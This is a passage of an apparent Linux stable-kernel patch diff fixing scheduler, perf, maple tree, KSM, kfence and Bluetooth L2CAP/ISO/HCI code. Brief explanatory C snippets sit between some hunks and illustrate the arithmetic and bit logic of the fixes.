+ 		return -EAGAIN;
+ 	}
+ 	if (ret == -ERESTARTSYS)
+diff --git a/io_uring/rsrc.c b/io_uring/rsrc.c
+index 185d5dfb7d569..4426d0e15174f 100644
+--- a/io_uring/rsrc.c
++++ b/io_uring/rsrc.c
+@@ -779,6 +779,7 @@ void __io_sqe_files_unregister(struct io_ring_ctx *ctx)
+ 	}
+ #endif
+ 	io_free_file_tables(&ctx->file_table);
++	io_file_table_set_alloc_range(ctx, 0, 0);
+ 	io_rsrc_data_free(ctx->file_data);
+ 	ctx->file_data = NULL;
+ 	ctx->nr_user_files = 0;
+diff --git a/kernel/bpf/core.c b/kernel/bpf/core.c
+index 211f63e87c637..64706723624b9 100644
+--- a/kernel/bpf/core.c
++++ b/kernel/bpf/core.c
+@@ -969,7 +969,7 @@ static int __init bpf_jit_charge_init(void)
+ {
+ 	/* Only used as heuristic here to derive limit. */
+ 	bpf_jit_limit_max = bpf_jit_alloc_exec_limit();
+-	bpf_jit_limit = min_t(u64, round_up(bpf_jit_limit_max >> 2,
++	bpf_jit_limit = min_t(u64, round_up(bpf_jit_limit_max >> 1,
+ 					    PAGE_SIZE), LONG_MAX);
+ 	return 0;
+ }
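
The hunk above raises the default JIT memory limit from a quarter to half of bpf_jit_limit_max, rounded up to a page. Worked for an illustrative 1 GiB limit (the real value is arch-dependent):

#include <stdio.h>

int main(void)
{
	unsigned long long max = 1ULL << 30;			/* 1 GiB */

	printf("old default: %llu MiB\n", (max >> 2) >> 20);	/* 256 */
	printf("new default: %llu MiB\n", (max >> 1) >> 20);	/* 512 */
	return 0;
}
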
+diff --git a/kernel/entry/common.c b/kernel/entry/common.c
+index 846add8394c41..be61332c66b54 100644
+--- a/kernel/entry/common.c
++++ b/kernel/entry/common.c
+@@ -21,7 +21,7 @@ static __always_inline void __enter_from_user_mode(struct pt_regs *regs)
+ 	arch_enter_from_user_mode(regs);
+ 	lockdep_hardirqs_off(CALLER_ADDR0);
+ 
+-	CT_WARN_ON(ct_state() != CONTEXT_USER);
++	CT_WARN_ON(__ct_state() != CONTEXT_USER);
+ 	user_exit_irqoff();
+ 
+ 	instrumentation_begin();
+@@ -192,13 +192,14 @@ static unsigned long exit_to_user_mode_loop(struct pt_regs *regs,
+ 
+ static void exit_to_user_mode_prepare(struct pt_regs *regs)
+ {
+-	unsigned long ti_work = read_thread_flags();
++	unsigned long ti_work;
+ 
+ 	lockdep_assert_irqs_disabled();
+ 
+ 	/* Flush pending rcuog wakeup before the last need_resched() check */
+ 	tick_nohz_user_enter_prepare();
+ 
++	ti_work = read_thread_flags();
+ 	if (unlikely(ti_work & EXIT_TO_USER_MODE_WORK))
+ 		ti_work = exit_to_user_mode_loop(regs, ti_work);
+ 
+diff --git a/kernel/events/core.c b/kernel/events/core.c
+index 227ada7240295..2aa286b4151b3 100644
+--- a/kernel/events/core.c
++++ b/kernel/events/core.c
+@@ -3830,7 +3830,7 @@ ctx_sched_in(struct perf_event_context *ctx,
+ 	if (likely(!ctx->nr_events))
+ 		return;
+ 
+-	if (is_active ^ EVENT_TIME) {
++	if (!(is_active & EVENT_TIME)) {
+ 		/* start ctx time */
+ 		__update_context_time(ctx, false);
+ 		perf_cgroup_set_timestamp(cpuctx);
+@@ -9009,7 +9009,7 @@ static void perf_event_bpf_output(struct perf_event *event, void *data)
+ 
+ 	perf_event_header__init_id(&bpf_event->event_id.header,
+ 				   &sample, event);
+-	ret = perf_output_begin(&handle, data, event,
++	ret = perf_output_begin(&handle, &sample, event,
+ 				bpf_event->event_id.header.size);
+ 	if (ret)
+ 		return;
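
The ctx_sched_in() fix swaps an exact-match test for a bit test: per the comment, the "start ctx time" branch should run only when the EVENT_TIME bit is still clear, but is_active ^ EVENT_TIME is nonzero whenever is_active differs from exactly EVENT_TIME, including when EVENT_TIME is set alongside other type bits. A two-line truth check; the bit values are illustrative, in the style of the kernel's enum event_type_t:

#include <stdio.h>

#define EVENT_FLEXIBLE 0x1
#define EVENT_PINNED   0x2
#define EVENT_TIME     0x4

int main(void)
{
	int is_active = EVENT_TIME | EVENT_PINNED;	/* time already started */

	printf("xor test: %d (wrongly restarts ctx time)\n",
	       (is_active ^ EVENT_TIME) != 0);		/* 1 */
	printf("bit test: %d (correctly skips)\n",
	       !(is_active & EVENT_TIME));		/* 0 */
	return 0;
}
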
+diff --git a/kernel/sched/core.c b/kernel/sched/core.c
+index f730b6fe94a7f..9ebfd484189b3 100644
+--- a/kernel/sched/core.c
++++ b/kernel/sched/core.c
+@@ -2082,6 +2082,9 @@ static inline void dequeue_task(struct rq *rq, struct task_struct *p, int flags)
+ 
+ void activate_task(struct rq *rq, struct task_struct *p, int flags)
+ {
++	if (task_on_rq_migrating(p))
++		flags |= ENQUEUE_MIGRATED;
++
+ 	enqueue_task(rq, p, flags);
+ 
+ 	p->on_rq = TASK_ON_RQ_QUEUED;
+diff --git a/kernel/sched/fair.c b/kernel/sched/fair.c
+index 2c3d0d49c80ea..88821ab009b30 100644
+--- a/kernel/sched/fair.c
++++ b/kernel/sched/fair.c
+@@ -4636,6 +4636,29 @@ static void check_spread(struct cfs_rq *cfs_rq, struct sched_entity *se)
+ #endif
+ }
+ 
++static inline bool entity_is_long_sleeper(struct sched_entity *se)
++{
++	struct cfs_rq *cfs_rq;
++	u64 sleep_time;
++
++	if (se->exec_start == 0)
++		return false;
++
++	cfs_rq = cfs_rq_of(se);
++
++	sleep_time = rq_clock_task(rq_of(cfs_rq));
++
++	/* Can happen while migrating because of clock_task divergence */
++	if (sleep_time <= se->exec_start)
++		return false;
++
++	sleep_time -= se->exec_start;
++	if (sleep_time > ((1ULL << 63) / scale_load_down(NICE_0_LOAD)))
++		return true;
++
++	return false;
++}
++
+ static void
+ place_entity(struct cfs_rq *cfs_rq, struct sched_entity *se, int initial)
+ {
+@@ -4669,8 +4692,29 @@ place_entity(struct cfs_rq *cfs_rq, struct sched_entity *se, int initial)
+ 		vruntime -= thresh;
+ 	}
+ 
+-	/* ensure we never gain time by being placed backwards. */
+-	se->vruntime = max_vruntime(se->vruntime, vruntime);
++	/*
++	 * Pull vruntime of the entity being placed to the base level of
++	 * cfs_rq, to prevent boosting it if placed backwards.
++	 * However, min_vruntime can advance much faster than real time, with
++	 * the extreme being when an entity with the minimal weight always runs
++	 * on the cfs_rq. If the waking entity slept for a long time, its
++	 * vruntime difference from min_vruntime may overflow s64 and their
++	 * comparison may get inverted, so ignore the entity's original
++	 * vruntime in that case.
++	 * The maximal vruntime speedup is given by the ratio of normal to
++	 * minimal weight: scale_load_down(NICE_0_LOAD) / MIN_SHARES.
++	 * When placing a migrated waking entity, its exec_start has been set
++	 * from a different rq. In order to take into account a possible
++	 * divergence between the new and prev rq's clock_task because of irq and
++	 * stolen time, we take an additional margin.
++	 * So, cutting off on the sleep time of
++	 *     2^63 / scale_load_down(NICE_0_LOAD) ~ 104 days
++	 * should be safe.
++	 */
++	if (entity_is_long_sleeper(se))
++		se->vruntime = vruntime;
++	else
++		se->vruntime = max_vruntime(se->vruntime, vruntime);
+ }
+ 
+ static void check_enqueue_throttle(struct cfs_rq *cfs_rq);
+@@ -4747,6 +4791,9 @@ enqueue_entity(struct cfs_rq *cfs_rq, struct sched_entity *se, int flags)
+ 
+ 	if (flags & ENQUEUE_WAKEUP)
+ 		place_entity(cfs_rq, se, 0);
++	/* Entity has migrated, no longer consider this task hot */
++	if (flags & ENQUEUE_MIGRATED)
++		se->exec_start = 0;
+ 
+ 	check_schedstat_required();
+ 	update_stats_enqueue_fair(cfs_rq, se, flags);
+@@ -7449,9 +7496,6 @@ static void migrate_task_rq_fair(struct task_struct *p, int new_cpu)
+ 	/* Tell new CPU we are migrated */
+ 	se->avg.last_update_time = 0;
+ 
+-	/* We have migrated, no longer consider this task hot */
+-	se->exec_start = 0;
+-
+ 	update_scan_period(p, new_cpu);
+ }
+ 
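
A quick check of the "~104 days" figure in the place_entity() comment above: scale_load_down(NICE_0_LOAD) is 1024, so the cutoff is 2^63 / 1024 = 2^53 nanoseconds:

#include <stdio.h>

int main(void)
{
	unsigned long long thresh_ns = (1ULL << 63) / 1024;	/* 2^53 */
	double days = (double)thresh_ns / 1e9 / 86400.0;

	printf("%llu ns = %.2f days\n", thresh_ns, days);
	/* 9007199254740992 ns = 104.25 days */
	return 0;
}
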
+diff --git a/kernel/trace/trace_hwlat.c b/kernel/trace/trace_hwlat.c
+index c4945f8adc119..2f37a6e68aa9f 100644
+--- a/kernel/trace/trace_hwlat.c
++++ b/kernel/trace/trace_hwlat.c
+@@ -339,7 +339,7 @@ static void move_to_next_cpu(void)
+ 	cpumask_clear(current_mask);
+ 	cpumask_set_cpu(next_cpu, current_mask);
+ 
+-	sched_setaffinity(0, current_mask);
++	set_cpus_allowed_ptr(current, current_mask);
+ 	return;
+ 
+  change_mode:
+@@ -446,7 +446,7 @@ static int start_single_kthread(struct trace_array *tr)
+ 
+ 	}
+ 
+-	sched_setaffinity(kthread->pid, current_mask);
++	set_cpus_allowed_ptr(kthread, current_mask);
+ 
+ 	kdata->kthread = kthread;
+ 	wake_up_process(kthread);
+diff --git a/lib/maple_tree.c b/lib/maple_tree.c
+index 69cb44b035ec1..96be96a1f35dc 100644
+--- a/lib/maple_tree.c
++++ b/lib/maple_tree.c
+@@ -5088,35 +5088,21 @@ static inline bool mas_rewind_node(struct ma_state *mas)
+  */
+ static inline bool mas_skip_node(struct ma_state *mas)
+ {
+-	unsigned char slot, slot_count;
+-	unsigned long *pivots;
+-	enum maple_type mt;
++	if (mas_is_err(mas))
++		return false;
+ 
+-	mt = mte_node_type(mas->node);
+-	slot_count = mt_slots[mt] - 1;
+ 	do {
+ 		if (mte_is_root(mas->node)) {
+-			slot = mas->offset;
+-			if (slot > slot_count) {
++			if (mas->offset >= mas_data_end(mas)) {
+ 				mas_set_err(mas, -EBUSY);
+ 				return false;
+ 			}
+ 		} else {
+ 			mas_ascend(mas);
+-			slot = mas->offset;
+-			mt = mte_node_type(mas->node);
+-			slot_count = mt_slots[mt] - 1;
+ 		}
+-	} while (slot > slot_count);
+-
+-	mas->offset = ++slot;
+-	pivots = ma_pivots(mas_mn(mas), mt);
+-	if (slot > 0)
+-		mas->min = pivots[slot - 1] + 1;
+-
+-	if (slot <= slot_count)
+-		mas->max = pivots[slot];
++	} while (mas->offset >= mas_data_end(mas));
+ 
++	mas->offset++;
+ 	return true;
+ }
+ 
+diff --git a/lib/test_maple_tree.c b/lib/test_maple_tree.c
+index ec847bf4dcb4d..f7364b9fee939 100644
+--- a/lib/test_maple_tree.c
++++ b/lib/test_maple_tree.c
+@@ -2602,6 +2602,49 @@ static noinline void check_empty_area_window(struct maple_tree *mt)
+ 	rcu_read_unlock();
+ }
+ 
++static noinline void check_empty_area_fill(struct maple_tree *mt)
++{
++	const unsigned long max = 0x25D78000;
++	unsigned long size;
++	int loop, shift;
++	MA_STATE(mas, mt, 0, 0);
++
++	mt_set_non_kernel(99999);
++	for (shift = 12; shift <= 16; shift++) {
++		loop = 5000;
++		size = 1 << shift;
++		while (loop--) {
++			mas_set(&mas, 0);
++			mas_lock(&mas);
++			MT_BUG_ON(mt, mas_empty_area(&mas, 0, max, size) != 0);
++			MT_BUG_ON(mt, mas.last != mas.index + size - 1);
++			mas_store_gfp(&mas, (void *)size, GFP_KERNEL);
++			mas_unlock(&mas);
++			mas_reset(&mas);
++		}
++	}
++
++	/* No space left. */
++	size = 0x1000;
++	rcu_read_lock();
++	MT_BUG_ON(mt, mas_empty_area(&mas, 0, max, size) != -EBUSY);
++	rcu_read_unlock();
++
++	/* Fill a depth 3 node to the maximum */
++	for (unsigned long i = 629440511; i <= 629440800; i += 6)
++		mtree_store_range(mt, i, i + 5, (void *)i, GFP_KERNEL);
++	/* Make space in the second-last depth 4 node */
++	mtree_erase(mt, 631668735);
++	/* Make space in the last depth 4 node */
++	mtree_erase(mt, 629506047);
++	mas_reset(&mas);
++	/* Search from just after the gap in the second-last depth 4 */
++	rcu_read_lock();
++	MT_BUG_ON(mt, mas_empty_area(&mas, 629506048, 690000000, 0x5000) != 0);
++	rcu_read_unlock();
++	mt_set_non_kernel(0);
++}
++
+ static DEFINE_MTREE(tree);
+ static int maple_tree_seed(void)
+ {
+@@ -2854,6 +2897,11 @@ static int maple_tree_seed(void)
+ 	check_empty_area_window(&tree);
+ 	mtree_destroy(&tree);
+ 
++	mt_init_flags(&tree, MT_FLAGS_ALLOC_RANGE);
++	check_empty_area_fill(&tree);
++	mtree_destroy(&tree);
++
++
+ #if defined(BENCH)
+ skip:
+ #endif
+diff --git a/mm/kfence/Makefile b/mm/kfence/Makefile
+index 0bb95728a7845..2de2a58d11a10 100644
+--- a/mm/kfence/Makefile
++++ b/mm/kfence/Makefile
+@@ -2,5 +2,5 @@
+ 
+ obj-y := core.o report.o
+ 
+-CFLAGS_kfence_test.o := -g -fno-omit-frame-pointer -fno-optimize-sibling-calls
++CFLAGS_kfence_test.o := -fno-omit-frame-pointer -fno-optimize-sibling-calls
+ obj-$(CONFIG_KFENCE_KUNIT_TEST) += kfence_test.o
+diff --git a/mm/kfence/core.c b/mm/kfence/core.c
+index 141788858b708..c3d04753806a2 100644
+--- a/mm/kfence/core.c
++++ b/mm/kfence/core.c
+@@ -727,10 +727,14 @@ static const struct seq_operations objects_sops = {
+ };
+ DEFINE_SEQ_ATTRIBUTE(objects);
+ 
+-static int __init kfence_debugfs_init(void)
++static int kfence_debugfs_init(void)
+ {
+-	struct dentry *kfence_dir = debugfs_create_dir("kfence", NULL);
++	struct dentry *kfence_dir;
+ 
++	if (!READ_ONCE(kfence_enabled))
++		return 0;
++
++	kfence_dir = debugfs_create_dir("kfence", NULL);
+ 	debugfs_create_file("stats", 0444, kfence_dir, NULL, &stats_fops);
+ 	debugfs_create_file("objects", 0400, kfence_dir, NULL, &objects_fops);
+ 	return 0;
+@@ -893,6 +897,8 @@ static int kfence_init_late(void)
+ 	}
+ 
+ 	kfence_init_enable();
++	kfence_debugfs_init();
++
+ 	return 0;
+ }
+ 
+diff --git a/mm/ksm.c b/mm/ksm.c
+index c19fcca9bc03d..cb272b6fde597 100644
+--- a/mm/ksm.c
++++ b/mm/ksm.c
+@@ -960,9 +960,15 @@ static int unmerge_and_remove_all_rmap_items(void)
+ 
+ 		mm = mm_slot->slot.mm;
+ 		mmap_read_lock(mm);
++
++		/*
++		 * Exit right away if mm is exiting to avoid a lockdep issue in
++		 * the maple tree.
++		 */
++		if (ksm_test_exit(mm))
++			goto mm_exiting;
++
+ 		for_each_vma(vmi, vma) {
+-			if (ksm_test_exit(mm))
+-				break;
+ 			if (!(vma->vm_flags & VM_MERGEABLE) || !vma->anon_vma)
+ 				continue;
+ 			err = unmerge_ksm_pages(vma,
+@@ -971,6 +977,7 @@ static int unmerge_and_remove_all_rmap_items(void)
+ 				goto error;
+ 		}
+ 
++mm_exiting:
+ 		remove_trailing_rmap_items(&mm_slot->rmap_list);
+ 		mmap_read_unlock(mm);
+ 
+diff --git a/mm/page_alloc.c b/mm/page_alloc.c
+index b2877a84ed19c..5cae089639848 100644
+--- a/mm/page_alloc.c
++++ b/mm/page_alloc.c
+@@ -1402,6 +1402,7 @@ static __always_inline bool free_pages_prepare(struct page *page,
+ 			unsigned int order, bool check_free, fpi_t fpi_flags)
+ {
+ 	int bad = 0;
++	bool skip_kasan_poison = should_skip_kasan_poison(page, fpi_flags);
+ 	bool init = want_init_on_free();
+ 
+ 	VM_BUG_ON_PAGE(PageTail(page), page);
+@@ -1476,7 +1477,7 @@ static __always_inline bool free_pages_prepare(struct page *page,
+ 	 * With hardware tag-based KASAN, memory tags must be set before the
+ 	 * page becomes unavailable via debug_pagealloc or arch_free_page.
+ 	 */
+-	if (!should_skip_kasan_poison(page, fpi_flags)) {
++	if (!skip_kasan_poison) {
+ 		kasan_poison_pages(page, order, init);
+ 
+ 		/* Memory is already initialized if KASAN did it internally. */
+diff --git a/mm/slab.c b/mm/slab.c
+index 59c8e28f7b6ab..62869bc3c2f9f 100644
+--- a/mm/slab.c
++++ b/mm/slab.c
+@@ -840,7 +840,7 @@ static int init_cache_node(struct kmem_cache *cachep, int node, gfp_t gfp)
+ 	return 0;
+ }
+ 
+-#if (defined(CONFIG_NUMA) && defined(CONFIG_MEMORY_HOTPLUG)) || defined(CONFIG_SMP)
++#if defined(CONFIG_NUMA) || defined(CONFIG_SMP)
+ /*
+  * Allocates and initializes node for a node on each slab cache, used for
+  * either memory or cpu hotplug.  If memory is being hot-added, the kmem_cache_node
+diff --git a/net/bluetooth/hci_core.c b/net/bluetooth/hci_core.c
+index b65c3aabcd536..334e308451f53 100644
+--- a/net/bluetooth/hci_core.c
++++ b/net/bluetooth/hci_core.c
+@@ -2871,10 +2871,25 @@ int hci_recv_frame(struct hci_dev *hdev, struct sk_buff *skb)
+ 		return -ENXIO;
+ 	}
+ 
+-	if (hci_skb_pkt_type(skb) != HCI_EVENT_PKT &&
+-	    hci_skb_pkt_type(skb) != HCI_ACLDATA_PKT &&
+-	    hci_skb_pkt_type(skb) != HCI_SCODATA_PKT &&
+-	    hci_skb_pkt_type(skb) != HCI_ISODATA_PKT) {
++	switch (hci_skb_pkt_type(skb)) {
++	case HCI_EVENT_PKT:
++		break;
++	case HCI_ACLDATA_PKT:
++		/* Detect if ISO packet has been sent as ACL */
++		if (hci_conn_num(hdev, ISO_LINK)) {
++			__u16 handle = __le16_to_cpu(hci_acl_hdr(skb)->handle);
++			__u8 type;
++
++			type = hci_conn_lookup_type(hdev, hci_handle(handle));
++			if (type == ISO_LINK)
++				hci_skb_pkt_type(skb) = HCI_ISODATA_PKT;
++		}
++		break;
++	case HCI_SCODATA_PKT:
++		break;
++	case HCI_ISODATA_PKT:
++		break;
++	default:
+ 		kfree_skb(skb);
+ 		return -EINVAL;
+ 	}
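
The ISO-as-ACL detection above extracts the 12-bit connection handle from the first little-endian word of the ACL data header; the top four bits carry the PB/BC flags, and hci_handle() in the kernel is the 0x0fff mask. A one-line userspace illustration of the split (the sample wire value is made up):

#include <stdint.h>
#include <stdio.h>

#define HANDLE_MASK 0x0fff	/* what the kernel's hci_handle() applies */

int main(void)
{
	uint16_t wire = 0x2a2b;	/* flags 0x2, handle 0xa2b */

	printf("handle 0x%03x, flags 0x%x\n",
	       wire & HANDLE_MASK, wire >> 12);
	return 0;
}
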
+diff --git a/net/bluetooth/hci_sync.c b/net/bluetooth/hci_sync.c
+index 3eec688a88a92..f614f96c5c23d 100644
+--- a/net/bluetooth/hci_sync.c
++++ b/net/bluetooth/hci_sync.c
+@@ -643,6 +643,7 @@ void hci_cmd_sync_clear(struct hci_dev *hdev)
+ 	cancel_work_sync(&hdev->cmd_sync_work);
+ 	cancel_work_sync(&hdev->reenable_adv_work);
+ 
++	mutex_lock(&hdev->cmd_sync_work_lock);
+ 	list_for_each_entry_safe(entry, tmp, &hdev->cmd_sync_work_list, list) {
+ 		if (entry->destroy)
+ 			entry->destroy(hdev, entry->data, -ECANCELED);
+@@ -650,6 +651,7 @@ void hci_cmd_sync_clear(struct hci_dev *hdev)
+ 		list_del(&entry->list);
+ 		kfree(entry);
+ 	}
++	mutex_unlock(&hdev->cmd_sync_work_lock);
+ }
+ 
+ void __hci_cmd_sync_cancel(struct hci_dev *hdev, int err)
+@@ -2367,6 +2369,45 @@ static int hci_resume_advertising_sync(struct hci_dev *hdev)
+ 	return err;
+ }
+ 
++static int hci_pause_addr_resolution(struct hci_dev *hdev)
++{
++	int err;
++
++	if (!use_ll_privacy(hdev))
++		return 0;
++
++	if (!hci_dev_test_flag(hdev, HCI_LL_RPA_RESOLUTION))
++		return 0;
++
++	/* Cannot disable addr resolution if scanning is enabled or
++	 * when initiating an LE connection.
++	 */
++	if (hci_dev_test_flag(hdev, HCI_LE_SCAN) ||
++	    hci_lookup_le_connect(hdev)) {
++		bt_dev_err(hdev, "Command not allowed when scan/LE connect");
++		return -EPERM;
++	}
++
++	/* Cannot disable addr resolution if advertising is enabled. */
++	err = hci_pause_advertising_sync(hdev);
++	if (err) {
++		bt_dev_err(hdev, "Pause advertising failed: %d", err);
++		return err;
++	}
++
++	err = hci_le_set_addr_resolution_enable_sync(hdev, 0x00);
++	if (err)
++		bt_dev_err(hdev, "Unable to disable Address Resolution: %d",
++			   err);
++
++	/* Return if address resolution is disabled and RPA is not used. */
++	if (!err && scan_use_rpa(hdev))
++		return err;
++
++	hci_resume_advertising_sync(hdev);
++	return err;
++}
++
+ struct sk_buff *hci_read_local_oob_data_sync(struct hci_dev *hdev,
+ 					     bool extended, struct sock *sk)
+ {
+@@ -2402,7 +2443,7 @@ static u8 hci_update_accept_list_sync(struct hci_dev *hdev)
+ 	u8 filter_policy;
+ 	int err;
+ 
+-	/* Pause advertising if resolving list can be used as controllers are
++	/* Pause advertising if resolving list can be used as controllers
+ 	 * cannot accept resolving list modifications while advertising.
+ 	 */
+ 	if (use_ll_privacy(hdev)) {
+@@ -3301,6 +3342,7 @@ static const struct hci_init_stage amp_init1[] = {
+ 	HCI_INIT(hci_read_flow_control_mode_sync),
+ 	/* HCI_OP_READ_LOCATION_DATA */
+ 	HCI_INIT(hci_read_location_data_sync),
++	{}
+ };
+ 
+ static int hci_init1_sync(struct hci_dev *hdev)
+@@ -3335,6 +3377,7 @@ static int hci_init1_sync(struct hci_dev *hdev)
+ static const struct hci_init_stage amp_init2[] = {
+ 	/* HCI_OP_READ_LOCAL_FEATURES */
+ 	HCI_INIT(hci_read_local_features_sync),
++	{}
+ };
+ 
+ /* Read Buffer Size (ACL mtu, max pkt, etc.) */
+@@ -5376,27 +5419,12 @@ static int hci_active_scan_sync(struct hci_dev *hdev, uint16_t interval)
+ 
+ 	cancel_interleave_scan(hdev);
+ 
+-	/* Pause advertising since active scanning disables address resolution
+-	 * which advertising depend on in order to generate its RPAs.
+-	 */
+-	if (use_ll_privacy(hdev) && hci_dev_test_flag(hdev, HCI_PRIVACY)) {
+-		err = hci_pause_advertising_sync(hdev);
+-		if (err) {
+-			bt_dev_err(hdev, "pause advertising failed: %d", err);
+-			goto failed;
+-		}
+-	}
+-
+-	/* Disable address resolution while doing active scanning since the
+-	 * accept list shall not be used and all reports shall reach the host
+-	 * anyway.
++	/* Pause address resolution for active scan and stop advertising if
++	 * privacy is enabled.
+ 	 */
+-	err = hci_le_set_addr_resolution_enable_sync(hdev, 0x00);
+-	if (err) {
+-		bt_dev_err(hdev, "Unable to disable Address Resolution: %d",
+-			   err);
++	err = hci_pause_addr_resolution(hdev);
++	if (err)
+ 		goto failed;
+-	}
+ 
+ 	/* All active scans will be done with either a resolvable private
+ 	 * address (when privacy feature has been enabled) or non-resolvable
+diff --git a/net/bluetooth/iso.c b/net/bluetooth/iso.c
+index 2dabef488eaae..cb959e8eac185 100644
+--- a/net/bluetooth/iso.c
++++ b/net/bluetooth/iso.c
+@@ -1621,7 +1621,6 @@ static void iso_disconn_cfm(struct hci_conn *hcon, __u8 reason)
+ void iso_recv(struct hci_conn *hcon, struct sk_buff *skb, u16 flags)
+ {
+ 	struct iso_conn *conn = hcon->iso_data;
+-	struct hci_iso_data_hdr *hdr;
+ 	__u16 pb, ts, len;
+ 
+ 	if (!conn)
+@@ -1643,6 +1642,8 @@ void iso_recv(struct hci_conn *hcon, struct sk_buff *skb, u16 flags)
+ 		}
+ 
+ 		if (ts) {
++			struct hci_iso_ts_data_hdr *hdr;
++
+ 			/* TODO: add timestamp to the packet? */
+ 			hdr = skb_pull_data(skb, HCI_ISO_TS_DATA_HDR_SIZE);
+ 			if (!hdr) {
+@@ -1650,15 +1651,19 @@ void iso_recv(struct hci_conn *hcon, struct sk_buff *skb, u16 flags)
+ 				goto drop;
+ 			}
+ 
++			len = __le16_to_cpu(hdr->slen);
+ 		} else {
++			struct hci_iso_data_hdr *hdr;
++
+ 			hdr = skb_pull_data(skb, HCI_ISO_DATA_HDR_SIZE);
+ 			if (!hdr) {
+ 				BT_ERR("Frame is too short (len %d)", skb->len);
+ 				goto drop;
+ 			}
++
++			len = __le16_to_cpu(hdr->slen);
+ 		}
+ 
+-		len    = __le16_to_cpu(hdr->slen);
+ 		flags  = hci_iso_data_flags(len);
+ 		len    = hci_iso_data_len(len);
+ 
+diff --git a/net/bluetooth/l2cap_core.c b/net/bluetooth/l2cap_core.c
+index da85768b04b76..b6f69d1feeeec 100644
+--- a/net/bluetooth/l2cap_core.c
++++ b/net/bluetooth/l2cap_core.c
+@@ -708,6 +708,17 @@ void l2cap_chan_del(struct l2cap_chan *chan, int err)
+ }
+ EXPORT_SYMBOL_GPL(l2cap_chan_del);
+ 
++static void __l2cap_chan_list_id(struct l2cap_conn *conn, u16 id,
++				 l2cap_chan_func_t func, void *data)
++{
++	struct l2cap_chan *chan, *l;
++
++	list_for_each_entry_safe(chan, l, &conn->chan_l, list) {
++		if (chan->ident == id)
++			func(chan, data);
++	}
++}
++
+ static void __l2cap_chan_list(struct l2cap_conn *conn, l2cap_chan_func_t func,
+ 			      void *data)
+ {
+@@ -775,23 +786,9 @@ static void l2cap_chan_le_connect_reject(struct l2cap_chan *chan)
+ 
+ static void l2cap_chan_ecred_connect_reject(struct l2cap_chan *chan)
+ {
+-	struct l2cap_conn *conn = chan->conn;
+-	struct l2cap_ecred_conn_rsp rsp;
+-	u16 result;
+-
+-	if (test_bit(FLAG_DEFER_SETUP, &chan->flags))
+-		result = L2CAP_CR_LE_AUTHORIZATION;
+-	else
+-		result = L2CAP_CR_LE_BAD_PSM;
+-
+ 	l2cap_state_change(chan, BT_DISCONN);
+ 
+-	memset(&rsp, 0, sizeof(rsp));
+-
+-	rsp.result  = cpu_to_le16(result);
+-
+-	l2cap_send_cmd(conn, chan->ident, L2CAP_LE_CONN_RSP, sizeof(rsp),
+-		       &rsp);
++	__l2cap_ecred_conn_rsp_defer(chan);
+ }
+ 
+ static void l2cap_chan_connect_reject(struct l2cap_chan *chan)
+@@ -846,7 +843,7 @@ void l2cap_chan_close(struct l2cap_chan *chan, int reason)
+ 					break;
+ 				case L2CAP_MODE_EXT_FLOWCTL:
+ 					l2cap_chan_ecred_connect_reject(chan);
+-					break;
++					return;
+ 				}
+ 			}
+ 		}
+@@ -3938,43 +3935,86 @@ void __l2cap_le_connect_rsp_defer(struct l2cap_chan *chan)
+ 		       &rsp);
+ }
+ 
+-void __l2cap_ecred_conn_rsp_defer(struct l2cap_chan *chan)
++static void l2cap_ecred_list_defer(struct l2cap_chan *chan, void *data)
+ {
++	int *result = data;
++
++	if (*result || test_bit(FLAG_ECRED_CONN_REQ_SENT, &chan->flags))
++		return;
++
++	switch (chan->state) {
++	case BT_CONNECT2:
++		/* If the channel is still pending accept, add it to the result */
++		(*result)++;
++		return;
++	case BT_CONNECTED:
++		return;
++	default:
++		/* If not connected or pending accept it has been refused */
++		*result = -ECONNREFUSED;
++		return;
++	}
++}
++
++struct l2cap_ecred_rsp_data {
+ 	struct {
+ 		struct l2cap_ecred_conn_rsp rsp;
+-		__le16 dcid[5];
++		__le16 scid[L2CAP_ECRED_MAX_CID];
+ 	} __packed pdu;
++	int count;
++};
++
++static void l2cap_ecred_rsp_defer(struct l2cap_chan *chan, void *data)
++{
++	struct l2cap_ecred_rsp_data *rsp = data;
++
++	if (test_bit(FLAG_ECRED_CONN_REQ_SENT, &chan->flags))
++		return;
++
++	/* Reset ident so only one response is sent */
++	chan->ident = 0;
++
++	/* Include all channels pending with the same ident */
++	if (!rsp->pdu.rsp.result)
++		rsp->pdu.rsp.dcid[rsp->count++] = cpu_to_le16(chan->scid);
++	else
++		l2cap_chan_del(chan, ECONNRESET);
++}
++
++void __l2cap_ecred_conn_rsp_defer(struct l2cap_chan *chan)
++{
+ 	struct l2cap_conn *conn = chan->conn;
+-	u16 ident = chan->ident;
+-	int i = 0;
++	struct l2cap_ecred_rsp_data data;
++	u16 id = chan->ident;
++	int result = 0;
+ 
+-	if (!ident)
++	if (!id)
+ 		return;
+ 
+-	BT_DBG("chan %p ident %d", chan, ident);
++	BT_DBG("chan %p id %d", chan, id);
+ 
+-	pdu.rsp.mtu     = cpu_to_le16(chan->imtu);
+-	pdu.rsp.mps     = cpu_to_le16(chan->mps);
+-	pdu.rsp.credits = cpu_to_le16(chan->rx_credits);
+-	pdu.rsp.result  = cpu_to_le16(L2CAP_CR_LE_SUCCESS);
++	memset(&data, 0, sizeof(data));
+ 
+-	mutex_lock(&conn->chan_lock);
++	data.pdu.rsp.mtu     = cpu_to_le16(chan->imtu);
++	data.pdu.rsp.mps     = cpu_to_le16(chan->mps);
++	data.pdu.rsp.credits = cpu_to_le16(chan->rx_credits);
++	data.pdu.rsp.result  = cpu_to_le16(L2CAP_CR_LE_SUCCESS);
+ 
+-	list_for_each_entry(chan, &conn->chan_l, list) {
+-		if (chan->ident != ident)
+-			continue;
++	/* Verify that all channels are ready */
++	__l2cap_chan_list_id(conn, id, l2cap_ecred_list_defer, &result);
+ 
+-		/* Reset ident so only one response is sent */
+-		chan->ident = 0;
++	if (result > 0)
++		return;
+ 
+-		/* Include all channels pending with the same ident */
+-		pdu.dcid[i++] = cpu_to_le16(chan->scid);
+-	}
++	if (result < 0)
++		data.pdu.rsp.result = cpu_to_le16(L2CAP_CR_LE_AUTHORIZATION);
+ 
+-	mutex_unlock(&conn->chan_lock);
++	/* Build response */
++	__l2cap_chan_list_id(conn, id, l2cap_ecred_rsp_defer, &data);
+ 
+-	l2cap_send_cmd(conn, ident, L2CAP_ECRED_CONN_RSP,
+-			sizeof(pdu.rsp) + i * sizeof(__le16), &pdu);
++	l2cap_send_cmd(conn, id, L2CAP_ECRED_CONN_RSP,
++		       sizeof(data.pdu.rsp) + (data.count * sizeof(__le16)),
++		       &data.pdu);
+ }
+ 
+ void __l2cap_connect_rsp_defer(struct l2cap_chan *chan)
